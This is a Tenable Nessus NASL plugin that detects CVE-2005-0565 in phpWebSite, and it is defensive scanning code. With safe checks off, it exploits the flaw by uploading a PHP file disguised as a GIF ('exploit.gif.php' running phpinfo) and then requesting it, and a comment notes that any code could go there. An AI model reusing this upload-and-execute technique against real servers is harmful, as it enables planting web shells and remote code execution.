phpWebSite Image Announcement Upload Arbitrary Command Execution

#%NASL_MIN_LEVEL 70300
#
# (C) Tenable Network Security, Inc.
#

include('deprecated_nasl_level.inc');
include('compat.inc');

if (description)
{
  script_id(17223);
  script_version("1.23");
  script_set_attribute(attribute:"plugin_modification_date", value:"2022/04/11");

  script_cve_id("CVE-2005-0565");
  script_bugtraq_id(12653);

  script_name(english:"phpWebSite Image Announcement Upload Arbitrary Command Execution");

  script_set_attribute(attribute:"synopsis", value:
"The remote web server contains a PHP script that allows for arbitrary
code execution.");
  script_set_attribute(attribute:"description", value:
"The remote host is running a version of phpWebSite in which the
Announcements module allows a remote attacker to both upload PHP
scripts disguised as image files and later run them using the
permissions of the web server user.");
  script_set_attribute(attribute:"see_also", value:"https://marc.info/?l=bugtraq&m=110928565530828&w=2");
  # http://phpwebsite.appstate.edu/index.php?module=announce&ANN_id=922&ANN_user_op=view
  script_set_attribute(attribute:"see_also", value:"http://www.nessus.org/u?13948819");
  script_set_attribute(attribute:"solution", value:
"Apply the security patch referenced in the vendor advisory above or
upgrade to version 0.10.1 or later.");
  script_set_cvss_base_vector("CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P");
  script_set_cvss_temporal_vector("CVSS2#E:U/RL:OF/RC:C");

  script_set_attribute(attribute:"exploitability_ease", value:"No exploit is required");
  script_set_attribute(attribute:"exploit_available", value:"false");

  script_set_attribute(attribute:"vuln_publication_date", value:"2005/02/25");
  script_set_attribute(attribute:"plugin_publication_date", value:"2005/02/25");

  script_set_attribute(attribute:"plugin_type", value:"remote");
  script_set_attribute(attribute:"cpe", value:"cpe:/a:phpwebsite:phpwebsite");
  script_set_attribute(attribute:"thorough_tests", value:"true");
  script_end_attributes();

  script_category(ACT_MIXED_ATTACK);
  script_family(english:"CGI abuses");

  script_copyright(english:"This script is Copyright (C) 2005-2022 Tenable Network Security, Inc.");

  script_dependencies("phpwebsite_detect.nasl");
  script_require_keys("www/phpwebsite");
  script_exclude_keys("Settings/disable_cgi_scanning");
  script_require_ports("Services/www", 80);

  exit(0);
}

include("global_settings.inc");
include("misc_func.inc");
include("http.inc");


port = get_http_port(default:80);
if (!can_host_php(port:port)) exit(0);


# Check each installed instance, stopping if we find a vulnerability.
install = get_kb_item(string("www/", port, "/phpwebsite"));
if (isnull(install)) exit(0);
matches = eregmatch(string:install, pattern:"^(.+) under (/.*)$");
if (!isnull(matches)) {
  init_cookiejar();
  ver = matches[1];
  dir = matches[2];

  url = "/index.php";
  url_args = "module=announce&ANN_user_op=submit_announcement";
  r = http_send_recv3(method: "GET", item:dir + url + "?" + url_args, port:port);
  if (isnull(r)) exit(0);

  # If file uploads are supported....
  if ('<input type="file" name="ANN_image"' >< r[2]) {

    # If safe_checks are enabled, rely on the version number alone.
    if (safe_checks()) {
      if (ver =~ "^0\.([0-9]\.|10\.0$)") {
        security_hole(port);
        exit(0);
      }
    }
    # Otherwise, try to exploit it.
    else {
      #  Grab the session cookie?

        bound = "bound";
        boundary = string("--", bound);
        postdata = string(
          boundary, "\r\n", 
          'Content-Disposition: form-data; name="module"', "\r\n",
          "\r\n",
          "announce\r\n",

          boundary, "\r\n", 
          'Content-Disposition: form-data; name="ANN_user_op"', "\r\n",
          "\r\n",
          "save\r\n",

          boundary, "\r\n", 
          'Content-Disposition: form-data; name="ANN_subject"', "\r\n",
          "\r\n",
          "Image Upload Test\r\n",

          boundary, "\r\n", 
          'Content-Disposition: form-data; name="ANN_summary"', "\r\n",
          "\r\n",
          "Image uploads are possible!\r\n",

          boundary, "\r\n", 
          'Content-Disposition: form-data; name="ANN_body"', "\r\n",
          "\r\n",
          "See attached image.\r\n",

          boundary, "\r\n", 
          'Content-Disposition: form-data; name="ANN_image"; filename="exploit.gif.php"', "\r\n",
          "Content-Type: image/gif\r\n",
          "\r\n",
          # NB: This is the actual exploit code; you could put pretty much
          #     anything you want here.
          "<?php phpinfo() ?>\r\n",

          boundary, "\r\n", 
          'Content-Disposition: form-data; name="ANN_alt"', "\r\n",
          "\r\n",
          "empty\r\n",

          boundary, "--", "\r\n"
        );
	r = http_send_recv3(port:port, method: "POST", item: dir+url, data: postdata,
add_headers: make_array("Content-Type", "multipart/form-data; boundary="+bound));
        if (isnull(r)) exit(0);

        # Run the attachment we just uploaded.
        url = string(dir, "/images/announce/exploit.gif.php");
        r = http_send_recv3(method: "GET", item:url, port:port);
        if (isnull(r)) exit(0);

        # If we could run it, there's a problem.
        if ("PHP Version" >< r[2]) {
          w = string(
              "**** Nessus has successfully exploited this vulnerability by uploading\n",
              "**** an image file with PHP code that reveals information about the\n",
              "**** PHP configuration on the remote host. The file is located under\n",
              "**** the web server's document directory as:\n",
              "****          ", url, "\n",
              "**** You are strongly encouraged to delete this attachment as soon as\n",
              "**** possible as it can be run by anyone who accesses it remotely.\n" );
          security_hole(port:port, extra: w);
          exit(0);
        }
      }
    }
}